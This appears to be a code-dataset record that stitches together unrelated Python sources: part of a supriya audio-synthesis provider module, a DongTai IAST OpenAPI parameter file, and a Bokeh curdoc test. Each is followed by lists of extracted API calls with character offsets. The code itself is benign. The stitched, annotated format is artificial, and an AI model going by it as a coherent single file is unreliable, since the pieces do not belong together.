return MappingProxyType(self._annotation_map)
@property
def latency(self):
return self._latency
@property
def moment(self) -> Optional[ProviderMoment]:
if self._moments:
return self._moments[-1]
return None
@property
def server(self) -> Server:
return self._server
@property
def session(self) -> Session:
return self._session
class NonrealtimeProvider(Provider):
### INITIALIZER ###
def __init__(self, session, latency=0.1):
if not isinstance(session, Session):
raise ValueError(f"Expected session, got {session}")
Provider.__init__(self, latency=latency)
self._session = session
### SPECIAL METHODS ###
def __str__(self):
return f"<{type(self).__name__} {self._session!r}>"
### PRIVATE METHODS ###
def _resolve_target_node(self, target_node) -> nonrealtime.Node:
if target_node is None:
target_node = self.session.root_node
elif isinstance(target_node, NodeProxy):
target_node = target_node.identifier
return target_node
### PUBLIC METHODS ###
def add_buffer(
self,
*,
channel_count: Optional[int] = None,
file_path: Optional[str] = None,
frame_count: Optional[int] = None,
starting_frame: Optional[int] = None,
) -> BufferProxy:
if not self.moment:
raise ValueError("No current moment")
identifier = self.session.add_buffer(
channel_count=channel_count,
file_path=file_path,
frame_count=frame_count,
starting_frame=starting_frame,
)
return BufferProxy(
channel_count=channel_count,
file_path=file_path,
frame_count=frame_count,
identifier=identifier,
provider=self,
starting_frame=starting_frame,
)
def add_bus(self, calculation_rate=CalculationRate.CONTROL) -> BusProxy:
if not self.moment:
raise ValueError("No current moment")
calculation_rate = CalculationRate.from_expr(calculation_rate)
if calculation_rate not in (CalculationRate.AUDIO, CalculationRate.CONTROL):
raise ValueError(f"Invalid calculation rate: {calculation_rate!r}")
identifier = self.session.add_bus(calculation_rate=calculation_rate)
return BusProxy(
calculation_rate=calculation_rate, identifier=identifier, provider=self
)
def add_bus_group(
self, channel_count=1, calculation_rate=CalculationRate.CONTROL
) -> BusGroupProxy:
if not self.moment:
raise ValueError("No current moment")
calculation_rate = CalculationRate.from_expr(calculation_rate)
if calculation_rate not in (CalculationRate.AUDIO, CalculationRate.CONTROL):
raise ValueError(f"Invalid calculation rate: {calculation_rate!r}")
if channel_count < 1:
raise ValueError("Channel-count must be positive, non-zero integer")
identifier = self.session.add_bus_group(
bus_count=channel_count, calculation_rate=calculation_rate
)
return BusGroupProxy(
calculation_rate=calculation_rate,
channel_count=channel_count,
identifier=identifier,
provider=self,
)
def add_group(
self,
*,
target_node=None,
add_action=AddAction.ADD_TO_HEAD,
name: Optional[str] = None,
) -> GroupProxy:
if not self.moment:
raise ValueError("No current moment")
identifier = self._resolve_target_node(target_node).add_group(
add_action=add_action
)
proxy = GroupProxy(identifier=identifier, provider=self)
return proxy
def add_synth(
self,
*,
synthdef: SynthDef = None,
target_node=None,
add_action=AddAction.ADD_TO_HEAD,
name: Optional[str] = None,
**settings,
) -> SynthProxy:
if not self.moment:
raise ValueError("No current moment")
sanitized_settings = {}
for key, value in settings.items():
if isinstance(value, (BusProxy, BusGroupProxy)):
value = value.identifier
sanitized_settings[key] = value
identifier = self._resolve_target_node(target_node).add_synth(
add_action=add_action, synthdef=synthdef, **sanitized_settings
)
proxy = SynthProxy(
identifier=identifier,
provider=self,
synthdef=synthdef or default,
settings=settings,
)
return proxy
def free_buffer(self, buffer_: BufferProxy):
if not self.moment:
raise ValueError("No current moment")
return # This is currently a no-op
def boot(self, **kwargs):
pass # no-op
def dispose(self, node_proxy: NodeProxy):
if not self.moment:
raise ValueError("No current moment")
return # This is currently a no-op
def free_bus(self, bus: BusProxy):
if not self.moment:
raise ValueError("No current moment")
return # This is currently a no-op
def free_bus_group(self, bus_group: BusGroupProxy):
if not self.moment:
raise ValueError("No current moment")
return # This is currently a no-op
def free_node(self, node_proxy: NodeProxy):
if not self.moment:
raise ValueError("No current moment")
cast(nonrealtime.Node, node_proxy.identifier).free()
def move_node(
self,
node_proxy: NodeProxy,
add_action: AddAction,
target_node: Union[NodeProxy, nonrealtime.Node],
):
if not self.moment:
raise ValueError("No current moment")
self._resolve_target_node(target_node).move_node(
node_proxy.identifier, add_action=add_action
)
def set_bus(self, bus_proxy: BusProxy, value: float):
if not self.moment:
raise ValueError("No current moment")
elif bus_proxy.calculation_rate != CalculationRate.CONTROL:
raise ValueError("Can only set control-rate buses")
cast(nonrealtime.Bus, bus_proxy.identifier).set_(value)
def set_node(self, node_proxy: NodeProxy, **settings):
if not self.moment:
raise ValueError("No current moment")
for key, value in settings.items():
if isinstance(value, (BusProxy, BusGroupProxy)):
value = value.identifier
cast(nonrealtime.Node, node_proxy.identifier)[key] = value
def quit(self):
pass # no-op
def register_osc_callback(
self, pattern: Tuple[Union[str, float], ...], procedure: Callable
) -> OscCallbackProxy:
return OscCallbackProxy(provider=self, identifier=None)
def unregister_osc_callback(self, proxy: OscCallbackProxy):
pass # no-op
class RealtimeProvider(Provider):
### INITIALIZER ###
def __init__(self, server, latency=0.1):
if not isinstance(server, BaseServer):
raise ValueError(f"Expected Server, got {server}")
Provider.__init__(self, latency=latency)
self._server = server
### SPECIAL METHODS ###
def __str__(self):
return f"<{type(self).__name__} {self._server!r}>"
### PRIVATE METHODS ###
def _resolve_target_node(self, target_node):
if target_node is None:
# TODO: Will this work with AsyncServer?
target_node = self.server.default_group
return target_node
### PUBLIC METHODS ###
def add_buffer(
self,
*,
channel_count: Optional[int] = None,
file_path: Optional[str] = None,
frame_count: Optional[int] = None,
starting_frame: Optional[int] = None,
) -> BufferProxy:
if not self.moment:
raise ValueError("No current moment")
identifier = self.server.buffer_allocator.allocate(1)
proxy = BufferProxy(
channel_count=channel_count,
file_path=file_path,
frame_count=frame_count,
identifier=identifier,
provider=self,
starting_frame=starting_frame,
)
self.moment.buffer_additions.append(proxy)
return proxy
def add_bus(self, calculation_rate=CalculationRate.CONTROL) -> BusProxy:
if not self.moment:
raise ValueError("No current moment")
calculation_rate = CalculationRate.from_expr(calculation_rate)
if calculation_rate not in (CalculationRate.AUDIO, CalculationRate.CONTROL):
raise ValueError(f"Invalid calculation rate: {calculation_rate!r}")
allocator = realtime.Bus._get_allocator(calculation_rate, server=self.server)
identifier = allocator.allocate(1)
return BusProxy(
calculation_rate=calculation_rate, identifier=identifier, provider=self
)
def add_bus_group(
self, channel_count=1, calculation_rate=CalculationRate.CONTROL
) -> BusGroupProxy:
if not self.moment:
raise ValueError("No current moment")
calculation_rate = CalculationRate.from_expr(calculation_rate)
if calculation_rate not in (CalculationRate.AUDIO, CalculationRate.CONTROL):
raise ValueError(f"Invalid calculation rate: {calculation_rate!r}")
if channel_count < 1:
raise ValueError("Channel-count must be positive, non-zero integer")
allocator = realtime.Bus._get_allocator(calculation_rate, server=self.server)
identifier = allocator.allocate(channel_count)
if identifier is None:
raise RuntimeError
return BusGroupProxy(
calculation_rate=calculation_rate,
channel_count=channel_count,
identifier=identifier,
provider=self,
)
def add_group(
self,
*,
target_node=None,
add_action=AddAction.ADD_TO_HEAD,
name: Optional[str] = None,
) -> GroupProxy:
if not self.moment:
raise ValueError("No current moment")
target_node = self._resolve_target_node(target_node)
identifier = self.server.node_id_allocator.allocate_node_id(1)
proxy = GroupProxy(identifier=identifier, provider=self)
self.moment.node_additions.append((proxy, add_action, target_node))
if name:
self._annotation_map[identifier] = name
return proxy
def add_synth(
self,
*,
synthdef: SynthDef = None,
target_node=None,
add_action=AddAction.ADD_TO_HEAD,
name: Optional[str] = None,
**settings,
) -> SynthProxy:
if not self.moment:
raise ValueError("No current moment")
target_node = self._resolve_target_node(target_node)
identifier = self.server.node_id_allocator.allocate_node_id(1)
proxy = SynthProxy(
identifier=identifier,
provider=self,
synthdef=synthdef or default,
settings=settings,
)
self.moment.node_additions.append((proxy, add_action, target_node))
if name:
self._annotation_map[identifier] = name
return proxy
def boot(self, **kwargs):
self.server.boot(**kwargs)
def dispose(self, node_proxy: NodeProxy):
if not self.moment:
raise ValueError("No current moment")
return # This is currently a no-op
def free_buffer(self, buffer_: BufferProxy):
if not self.moment:
raise ValueError("No current moment")
self.moment.buffer_removals.append(buffer_)
def free_bus(self, bus_proxy: BusProxy):
if not self.moment:
raise ValueError("No current moment")
allocator = realtime.Bus._get_allocator(
bus_proxy.calculation_rate, server=self.server
)
allocator.free(cast(int, bus_proxy.identifier))
def free_bus_group(self, bus_group_proxy: BusGroupProxy):
if not self.moment:
raise ValueError("No current moment")
allocator = realtime.Bus._get_allocator(
bus_group_proxy.calculation_rate, server=self.server
)
allocator.free(cast(int, bus_group_proxy.identifier))
def free_node(self, node_proxy: NodeProxy):
if not self.moment:
raise ValueError("No current moment")
self.moment.node_removals.append(node_proxy)
self._annotation_map.pop(node_proxy.identifier, None)
def move_node(
self, node_proxy: NodeProxy, add_action: AddAction, target_node: NodeProxy
):
if not self.moment:
raise ValueError("No current moment")
target_node = self._resolve_target_node(target_node)
self.moment.node_reorderings.append((node_proxy, add_action, target_node))
def quit(self):
self.server.quit()
def set_bus(self, bus_proxy: BusProxy, value: float):
if not self.moment:
raise ValueError("No current moment")
elif bus_proxy.calculation_rate != CalculationRate.CONTROL:
raise ValueError("Can only set control-rate buses")
self.moment.bus_settings.append((bus_proxy, value))
def set_node(self, node_proxy: NodeProxy, **settings):
if not self.moment:
raise ValueError("No current moment")
self.moment.node_settings.append((node_proxy, settings))
def register_osc_callback(
self, pattern: Tuple[Union[str, float], ...], procedure: Callable
) -> OscCallbackProxy:
identifier = self.server.osc_protocol.register(
pattern=pattern, procedure=procedure
)
return OscCallbackProxy(provider=self, identifier=identifier)
def unregister_osc_callback(self, proxy: OscCallbackProxy):
self.server.osc_protocol.unregister(proxy.identifier)
|
[
"typing.cast",
"supriya.enums.CalculationRate.from_expr",
"supriya.commands.BufferAllocateRequest",
"contextlib.ExitStack",
"tempfile.mkdtemp",
"collections.Counter",
"re.sub",
"supriya.commands.ControlBusSetRequest",
"supriya.realtime.Bus._get_allocator",
"types.MappingProxyType",
"dataclasses.field",
"supriya.commands.RequestBundle.partition",
"supriya.commands.RequestBundle",
"dataclasses.dataclass",
"supriya.realtime.AsyncServer",
"supriya.realtime.Server",
"supriya.nonrealtime.Session",
"uqbar.objects.new",
"supriya.commands.BufferAllocateReadRequest"
] |
[((814, 848), 'dataclasses.dataclass', 'dataclasses.dataclass', ([], {'frozen': '(True)'}), '(frozen=True)\n', (835, 848), False, 'import dataclasses\n'), ((890, 924), 'dataclasses.dataclass', 'dataclasses.dataclass', ([], {'frozen': '(True)'}), '(frozen=True)\n', (911, 924), False, 'import dataclasses\n'), ((2539, 2573), 'dataclasses.dataclass', 'dataclasses.dataclass', ([], {'frozen': '(True)'}), '(frozen=True)\n', (2560, 2573), False, 'import dataclasses\n'), ((2732, 2766), 'dataclasses.dataclass', 'dataclasses.dataclass', ([], {'frozen': '(True)'}), '(frozen=True)\n', (2753, 2766), False, 'import dataclasses\n'), ((3446, 3480), 'dataclasses.dataclass', 'dataclasses.dataclass', ([], {'frozen': '(True)'}), '(frozen=True)\n', (3467, 3480), False, 'import dataclasses\n'), ((4769, 4803), 'dataclasses.dataclass', 'dataclasses.dataclass', ([], {'frozen': '(True)'}), '(frozen=True)\n', (4790, 4803), False, 'import dataclasses\n'), ((7180, 7214), 'dataclasses.dataclass', 'dataclasses.dataclass', ([], {'frozen': '(True)'}), '(frozen=True)\n', (7201, 7214), False, 'import dataclasses\n'), ((7786, 7820), 'dataclasses.dataclass', 'dataclasses.dataclass', ([], {'frozen': '(True)'}), '(frozen=True)\n', (7807, 7820), False, 'import dataclasses\n'), ((9536, 9570), 'dataclasses.dataclass', 'dataclasses.dataclass', ([], {'frozen': '(True)'}), '(frozen=True)\n', (9557, 9570), False, 'import dataclasses\n'), ((3688, 3717), 'dataclasses.field', 'dataclasses.field', ([], {'init': '(False)'}), '(init=False)\n', (3705, 3717), False, 'import dataclasses\n'), ((9686, 9725), 'dataclasses.field', 'dataclasses.field', ([], {'default_factory': 'list'}), '(default_factory=list)\n', (9703, 9725), False, 'import dataclasses\n'), ((9768, 9807), 'dataclasses.field', 'dataclasses.field', ([], {'default_factory': 'list'}), '(default_factory=list)\n', (9785, 9807), False, 'import dataclasses\n'), ((9849, 9888), 'dataclasses.field', 'dataclasses.field', ([], {'default_factory': 'list'}), '(default_factory=list)\n', (9866, 9888), False, 'import dataclasses\n'), ((9958, 9997), 'dataclasses.field', 'dataclasses.field', ([], {'default_factory': 'list'}), '(default_factory=list)\n', (9975, 9997), False, 'import dataclasses\n'), ((10079, 10118), 'dataclasses.field', 'dataclasses.field', ([], {'default_factory': 'list'}), '(default_factory=list)\n', (10096, 10118), False, 'import dataclasses\n'), ((10170, 10209), 'dataclasses.field', 'dataclasses.field', ([], {'default_factory': 'list'}), '(default_factory=list)\n', (10187, 10209), False, 'import dataclasses\n'), ((10308, 10347), 'dataclasses.field', 'dataclasses.field', ([], {'default_factory': 'list'}), '(default_factory=list)\n', (10325, 10347), False, 'import dataclasses\n'), ((10365, 10397), 'dataclasses.field', 'dataclasses.field', ([], {'default': '(False)'}), '(default=False)\n', (10382, 10397), False, 'import dataclasses\n'), ((10437, 10524), 'dataclasses.field', 'dataclasses.field', ([], {'init': '(False)', 'default_factory': 'contextlib.ExitStack', 'compare': '(False)'}), '(init=False, default_factory=contextlib.ExitStack, compare\n =False)\n', (10454, 10524), False, 'import dataclasses\n'), ((10589, 10611), 'contextlib.ExitStack', 'contextlib.ExitStack', ([], {}), '()\n', (10609, 10611), False, 'import contextlib\n'), ((17615, 17636), 'collections.Counter', 'collections.Counter', ([], {}), '()\n', (17634, 17636), False, 'import collections\n'), ((20713, 20722), 'supriya.nonrealtime.Session', 'Session', ([], {}), '()\n', (20720, 20722), False, 'from supriya.nonrealtime import Session\n'), ((21020, 21028), 'supriya.realtime.Server', 'Server', ([], {}), '()\n', (21026, 21028), False, 'from supriya.realtime import AsyncServer, BaseServer, Server\n'), ((21340, 21353), 'supriya.realtime.AsyncServer', 'AsyncServer', ([], {}), '()\n', (21351, 21353), False, 'from supriya.realtime import AsyncServer, BaseServer, Server\n'), ((21994, 22032), 'types.MappingProxyType', 'MappingProxyType', (['self._annotation_map'], {}), '(self._annotation_map)\n', (22010, 22032), False, 'from types import MappingProxyType\n'), ((24117, 24160), 'supriya.enums.CalculationRate.from_expr', 'CalculationRate.from_expr', (['calculation_rate'], {}), '(calculation_rate)\n', (24142, 24160), False, 'from supriya.enums import AddAction, CalculationRate, ParameterRate\n'), ((24747, 24790), 'supriya.enums.CalculationRate.from_expr', 'CalculationRate.from_expr', (['calculation_rate'], {}), '(calculation_rate)\n', (24772, 24790), False, 'from supriya.enums import AddAction, CalculationRate, ParameterRate\n'), ((30584, 30627), 'supriya.enums.CalculationRate.from_expr', 'CalculationRate.from_expr', (['calculation_rate'], {}), '(calculation_rate)\n', (30609, 30627), False, 'from supriya.enums import AddAction, CalculationRate, ParameterRate\n'), ((30813, 30878), 'supriya.realtime.Bus._get_allocator', 'realtime.Bus._get_allocator', (['calculation_rate'], {'server': 'self.server'}), '(calculation_rate, server=self.server)\n', (30840, 30878), False, 'from supriya import commands, nonrealtime, realtime\n'), ((31266, 31309), 'supriya.enums.CalculationRate.from_expr', 'CalculationRate.from_expr', (['calculation_rate'], {}), '(calculation_rate)\n', (31291, 31309), False, 'from supriya.enums import AddAction, CalculationRate, ParameterRate\n'), ((31606, 31671), 'supriya.realtime.Bus._get_allocator', 'realtime.Bus._get_allocator', (['calculation_rate'], {'server': 'self.server'}), '(calculation_rate, server=self.server)\n', (31633, 31671), False, 'from supriya import commands, nonrealtime, realtime\n'), ((33923, 33998), 'supriya.realtime.Bus._get_allocator', 'realtime.Bus._get_allocator', (['bus_proxy.calculation_rate'], {'server': 'self.server'}), '(bus_proxy.calculation_rate, server=self.server)\n', (33950, 33998), False, 'from supriya import commands, nonrealtime, realtime\n'), ((34238, 34324), 'supriya.realtime.Bus._get_allocator', 'realtime.Bus._get_allocator', (['bus_group_proxy.calculation_rate'], {'server': 'self.server'}), '(bus_group_proxy.calculation_rate, server=self.\n server)\n', (34265, 34324), False, 'from supriya import commands, nonrealtime, realtime\n'), ((2011, 2085), 'supriya.commands.BufferAllocateRequest', 'commands.BufferAllocateRequest', ([], {'channel_count': 'self.channel_count'}), '(**kwargs, channel_count=self.channel_count)\n', (2041, 2085), False, 'from supriya import commands, nonrealtime, realtime\n'), ((2258, 2302), 'supriya.commands.BufferAllocateReadRequest', 'commands.BufferAllocateReadRequest', ([], {}), '(**kwargs)\n', (2292, 2302), False, 'from supriya import commands, nonrealtime, realtime\n'), ((15302, 15363), 'supriya.commands.ControlBusSetRequest', 'commands.ControlBusSetRequest', ([], {'index_value_pairs': 'sorted_pairs'}), '(index_value_pairs=sorted_pairs)\n', (15331, 15363), False, 'from supriya import commands, nonrealtime, realtime\n'), ((17100, 17162), 'supriya.commands.RequestBundle', 'commands.RequestBundle', ([], {'timestamp': 'timestamp', 'contents': 'requests'}), '(timestamp=timestamp, contents=requests)\n', (17122, 17162), False, 'from supriya import commands, nonrealtime, realtime\n'), ((34044, 34075), 'typing.cast', 'cast', (['int', 'bus_proxy.identifier'], {}), '(int, bus_proxy.identifier)\n', (34048, 34075), False, 'from typing import Any, Callable, Dict, List, Mapping, Optional, Sequence, Tuple, Type, Union, cast\n'), ((34365, 34402), 'typing.cast', 'cast', (['int', 'bus_group_proxy.identifier'], {}), '(int, bus_group_proxy.identifier)\n', (34369, 34402), False, 'from typing import Any, Callable, Dict, List, Mapping, Optional, Sequence, Tuple, Type, Union, cast\n'), ((11776, 11812), 'uqbar.objects.new', 'new', (['synthdef_request'], {'callback': 'None'}), '(synthdef_request, callback=None)\n', (11779, 11812), False, 'from uqbar.objects import new\n'), ((12035, 12077), 'supriya.commands.RequestBundle.partition', 'commands.RequestBundle.partition', (['requests'], {}), '(requests)\n', (12067, 12077), False, 'from supriya import commands, nonrealtime, realtime\n'), ((12204, 12267), 'supriya.commands.RequestBundle.partition', 'commands.RequestBundle.partition', (['requests'], {'timestamp': 'timestamp'}), '(requests, timestamp=timestamp)\n', (12236, 12267), False, 'from supriya import commands, nonrealtime, realtime\n'), ((13317, 13380), 'supriya.commands.RequestBundle.partition', 'commands.RequestBundle.partition', (['requests'], {'timestamp': 'timestamp'}), '(requests, timestamp=timestamp)\n', (13349, 13380), False, 'from supriya import commands, nonrealtime, realtime\n'), ((27581, 27626), 'typing.cast', 'cast', (['nonrealtime.Node', 'node_proxy.identifier'], {}), '(nonrealtime.Node, node_proxy.identifier)\n', (27585, 27626), False, 'from typing import Any, Callable, Dict, List, Mapping, Optional, Sequence, Tuple, Type, Union, cast\n'), ((28274, 28317), 'typing.cast', 'cast', (['nonrealtime.Bus', 'bus_proxy.identifier'], {}), '(nonrealtime.Bus, bus_proxy.identifier)\n', (28278, 28317), False, 'from typing import Any, Callable, Dict, List, Mapping, Optional, Sequence, Tuple, Type, Union, cast\n'), ((28626, 28671), 'typing.cast', 'cast', (['nonrealtime.Node', 'node_proxy.identifier'], {}), '(nonrealtime.Node, node_proxy.identifier)\n', (28630, 28671), False, 'from typing import Any, Callable, Dict, List, Mapping, Optional, Sequence, Tuple, Type, Union, cast\n'), ((13169, 13205), 'uqbar.objects.new', 'new', (['synthdef_request'], {'callback': 'None'}), '(synthdef_request, callback=None)\n', (13172, 13205), False, 'from uqbar.objects import new\n'), ((16162, 16180), 'tempfile.mkdtemp', 'tempfile.mkdtemp', ([], {}), '()\n', (16178, 16180), False, 'import tempfile\n'), ((16426, 16462), 're.sub', 're.sub', (['"""[^\\\\w]"""', '"""-"""', 'synthdef.name'], {}), "('[^\\\\w]', '-', synthdef.name)\n", (16432, 16462), False, 'import re\n'), ((15867, 15908), 'supriya.commands.RequestBundle', 'commands.RequestBundle', ([], {'contents': 'requests'}), '(contents=requests)\n', (15889, 15908), False, 'from supriya import commands, nonrealtime, realtime\n'), ((16947, 16988), 'supriya.commands.RequestBundle', 'commands.RequestBundle', ([], {'contents': 'requests'}), '(contents=requests)\n', (16969, 16988), False, 'from supriya import commands, nonrealtime, realtime\n')]
|
#!/usr/bin/env python
# -*- coding:utf-8 -*-
# author: <EMAIL>
# datetime: 2021/9/28 上午10:51
# project: dongtai-openapi
from drf_spectacular.utils import OpenApiParameter, OpenApiExample
class DongTaiAuth:
TOKEN = 'TokenAuthentication'
class DongTaiParameter:
OPENAPI_URL = OpenApiParameter(
name='url',
description='OpenAPI Service Addr',
required=True,
type=str,
examples=[
OpenApiExample(
'url example',
summary='default',
value='https://openapi.iast.io',
),
],
)
PROJECT_NAME = OpenApiParameter(
name='projectName',
type=str,
description='The name of the project where the Agent needs to be installed',
examples=[
OpenApiExample(
'example with https://iast.io',
summary='default',
value='Demo Project',
),
],
)
LANGUAGE = OpenApiParameter(
name='language',
type=str,
description='The development language of the project that needs to install the Agent',
required=True,
examples=[
OpenApiExample(
'example language',
summary='JAVA or PYTHON',
value='JAVA',
),
],
)
VERSION = OpenApiParameter(
name='version',
type=str,
description='The development language of the project that needs to install the Agent',
required=True,
examples=[
OpenApiExample(
'example language',
summary='java or python',
value='java',
),
],
)
AGENT_NAME = OpenApiParameter(
name='name',
type=str,
description='The development language of the project that needs to install the Agent',
required=True,
examples=[
OpenApiExample(
'example language',
summary='java or python',
value='java',
),
],
)
HOSTNAME = OpenApiParameter(
name='engineName',
type=str,
description='The development language of the project that needs to install the Agent',
required=True,
examples=[
OpenApiExample(
'example language',
summary='java or python',
value='java',
),
],
)
NETWORK = OpenApiParameter(
name='engineName',
type=str,
description='The development language of the project that needs to install the Agent',
required=True,
examples=[
OpenApiExample(
'example language',
summary='java or python',
value='java',
),
],
)
CONTAINER_NAME = OpenApiParameter(
name='containerName',
type=str,
description='The development language of the project that needs to install the Agent',
required=True,
examples=[
OpenApiExample(
'example language',
summary='java or python',
value='java',
),
],
)
CONTAINER_VERSION = OpenApiParameter(
name='containerVersion',
type=str,
description='The development language of the project that needs to install the Agent',
required=True,
examples=[
OpenApiExample(
'example language',
summary='java or python',
value='java',
),
],
)
SERVER_ADDR = OpenApiParameter(
name='serverAddr',
type=str,
description='The development language of the project that needs to install the Agent',
required=True,
examples=[
OpenApiExample(
'example language',
summary='java or python',
value='java',
),
],
)
SERVER_PORT = OpenApiParameter(
name='serverPort',
type=str,
description='The development language of the project that needs to install the Agent',
required=True,
examples=[
OpenApiExample(
'example language',
summary='java or python',
value='java',
),
],
)
SERVER_PATH = OpenApiParameter(
name='serverPath',
type=str,
description='The development language of the project that needs to install the Agent',
required=True,
examples=[
OpenApiExample(
'example language',
summary='java or python',
value='java',
),
],
)
SERVER_ENV = OpenApiParameter(
name='serverEnv',
type=str,
description='The development language of the project that needs to install the Agent',
required=True,
examples=[
OpenApiExample(
'example language',
summary='java or python',
value='java',
),
],
)
PID = OpenApiParameter(
name='pid',
type=str,
description=
'The development language of the project that needs to install the Agent',
required=True,
examples=[
OpenApiExample(
'example language',
summary='java or python',
value='java',
),
],
)
AUTO_CREATE_PROJECT = OpenApiParameter(
name='autoCreateProject',
type=int,
description=
'auto create project if project not found when this varibale is 1',
required=True,
examples=[
OpenApiExample(
'default value',
value=0,
),
OpenApiExample(
'enable value',
value=1,
),
],
)
ENGINE_NAME = OpenApiParameter(
name='engineName',
type=str,
description='The development language of the project that needs to install the Agent',
required=True,
examples=[
OpenApiExample(
'example language',
summary='java or python',
value='java',
),
],
)
|
[
"drf_spectacular.utils.OpenApiExample"
] |
[((440, 526), 'drf_spectacular.utils.OpenApiExample', 'OpenApiExample', (['"""url example"""'], {'summary': '"""default"""', 'value': '"""https://openapi.iast.io"""'}), "('url example', summary='default', value=\n 'https://openapi.iast.io')\n", (454, 526), False, 'from drf_spectacular.utils import OpenApiParameter, OpenApiExample\n'), ((802, 894), 'drf_spectacular.utils.OpenApiExample', 'OpenApiExample', (['"""example with https://iast.io"""'], {'summary': '"""default"""', 'value': '"""Demo Project"""'}), "('example with https://iast.io', summary='default', value=\n 'Demo Project')\n", (816, 894), False, 'from drf_spectacular.utils import OpenApiParameter, OpenApiExample\n'), ((1197, 1271), 'drf_spectacular.utils.OpenApiExample', 'OpenApiExample', (['"""example language"""'], {'summary': '"""JAVA or PYTHON"""', 'value': '"""JAVA"""'}), "('example language', summary='JAVA or PYTHON', value='JAVA')\n", (1211, 1271), False, 'from drf_spectacular.utils import OpenApiParameter, OpenApiExample\n'), ((1577, 1651), 'drf_spectacular.utils.OpenApiExample', 'OpenApiExample', (['"""example language"""'], {'summary': '"""java or python"""', 'value': '"""java"""'}), "('example language', summary='java or python', value='java')\n", (1591, 1651), False, 'from drf_spectacular.utils import OpenApiParameter, OpenApiExample\n'), ((1957, 2031), 'drf_spectacular.utils.OpenApiExample', 'OpenApiExample', (['"""example language"""'], {'summary': '"""java or python"""', 'value': '"""java"""'}), "('example language', summary='java or python', value='java')\n", (1971, 2031), False, 'from drf_spectacular.utils import OpenApiParameter, OpenApiExample\n'), ((2341, 2415), 'drf_spectacular.utils.OpenApiExample', 'OpenApiExample', (['"""example language"""'], {'summary': '"""java or python"""', 'value': '"""java"""'}), "('example language', summary='java or python', value='java')\n", (2355, 2415), False, 'from drf_spectacular.utils import OpenApiParameter, OpenApiExample\n'), ((2724, 2798), 'drf_spectacular.utils.OpenApiExample', 'OpenApiExample', (['"""example language"""'], {'summary': '"""java or python"""', 'value': '"""java"""'}), "('example language', summary='java or python', value='java')\n", (2738, 2798), False, 'from drf_spectacular.utils import OpenApiParameter, OpenApiExample\n'), ((3117, 3191), 'drf_spectacular.utils.OpenApiExample', 'OpenApiExample', (['"""example language"""'], {'summary': '"""java or python"""', 'value': '"""java"""'}), "('example language', summary='java or python', value='java')\n", (3131, 3191), False, 'from drf_spectacular.utils import OpenApiParameter, OpenApiExample\n'), ((3516, 3590), 'drf_spectacular.utils.OpenApiExample', 'OpenApiExample', (['"""example language"""'], {'summary': '"""java or python"""', 'value': '"""java"""'}), "('example language', summary='java or python', value='java')\n", (3530, 3590), False, 'from drf_spectacular.utils import OpenApiParameter, OpenApiExample\n'), ((3903, 3977), 'drf_spectacular.utils.OpenApiExample', 'OpenApiExample', (['"""example language"""'], {'summary': '"""java or python"""', 'value': '"""java"""'}), "('example language', summary='java or python', value='java')\n", (3917, 3977), False, 'from drf_spectacular.utils import OpenApiParameter, OpenApiExample\n'), ((4290, 4364), 'drf_spectacular.utils.OpenApiExample', 'OpenApiExample', (['"""example language"""'], {'summary': '"""java or python"""', 'value': '"""java"""'}), "('example language', summary='java or python', value='java')\n", (4304, 4364), False, 'from drf_spectacular.utils import OpenApiParameter, OpenApiExample\n'), ((4677, 4751), 'drf_spectacular.utils.OpenApiExample', 'OpenApiExample', (['"""example language"""'], {'summary': '"""java or python"""', 'value': '"""java"""'}), "('example language', summary='java or python', value='java')\n", (4691, 4751), False, 'from drf_spectacular.utils import OpenApiParameter, OpenApiExample\n'), ((5062, 5136), 'drf_spectacular.utils.OpenApiExample', 'OpenApiExample', (['"""example language"""'], {'summary': '"""java or python"""', 'value': '"""java"""'}), "('example language', summary='java or python', value='java')\n", (5076, 5136), False, 'from drf_spectacular.utils import OpenApiParameter, OpenApiExample\n'), ((5443, 5517), 'drf_spectacular.utils.OpenApiExample', 'OpenApiExample', (['"""example language"""'], {'summary': '"""java or python"""', 'value': '"""java"""'}), "('example language', summary='java or python', value='java')\n", (5457, 5517), False, 'from drf_spectacular.utils import OpenApiParameter, OpenApiExample\n'), ((5847, 5887), 'drf_spectacular.utils.OpenApiExample', 'OpenApiExample', (['"""default value"""'], {'value': '(0)'}), "('default value', value=0)\n", (5861, 5887), False, 'from drf_spectacular.utils import OpenApiParameter, OpenApiExample\n'), ((5948, 5987), 'drf_spectacular.utils.OpenApiExample', 'OpenApiExample', (['"""enable value"""'], {'value': '(1)'}), "('enable value', value=1)\n", (5962, 5987), False, 'from drf_spectacular.utils import OpenApiParameter, OpenApiExample\n'), ((6283, 6357), 'drf_spectacular.utils.OpenApiExample', 'OpenApiExample', (['"""example language"""'], {'summary': '"""java or python"""', 'value': '"""java"""'}), "('example language', summary='java or python', value='java')\n", (6297, 6357), False, 'from drf_spectacular.utils import OpenApiParameter, OpenApiExample\n')]
|
#-----------------------------------------------------------------------------
# Copyright (c) 2012 - 2017, Anaconda, Inc. All rights reserved.
#
# Powered by the Bokeh Development Team.
#
# The full license is in the file LICENSE.txt, distributed with this software.
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Boilerplate
#-----------------------------------------------------------------------------
from __future__ import absolute_import, division, print_function, unicode_literals
import pytest ; pytest
from bokeh.util.api import DEV, GENERAL ; DEV, GENERAL
from bokeh.util.testing import verify_api ; verify_api
#-----------------------------------------------------------------------------
# Imports
#-----------------------------------------------------------------------------
# Standard library imports
# External imports
# Bokeh imports
from bokeh.document import Document
from bokeh.io.state import curstate
# Module under test
import bokeh.io.doc as bid
#-----------------------------------------------------------------------------
# API Definition
#-----------------------------------------------------------------------------
api = {
GENERAL: (
( 'curdoc', (1, 0, 0) ),
), DEV: (
( 'set_curdoc', (1, 0, 0) ),
)
}
Test_api = verify_api(bid, api)
#-----------------------------------------------------------------------------
# Setup
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# General API
#-----------------------------------------------------------------------------
def test_curdoc_from_curstate():
assert bid.curdoc() is curstate().document
#-----------------------------------------------------------------------------
# Dev API
#-----------------------------------------------------------------------------
def test_set_curdoc_sets_curstate():
d = Document()
bid.set_curdoc(d)
assert curstate().document is d
#-----------------------------------------------------------------------------
# Private API
#-----------------------------------------------------------------------------
|
[
"bokeh.io.doc.curdoc",
"bokeh.document.Document",
"bokeh.util.testing.verify_api",
"bokeh.io.state.curstate",
"bokeh.io.doc.set_curdoc"
] |
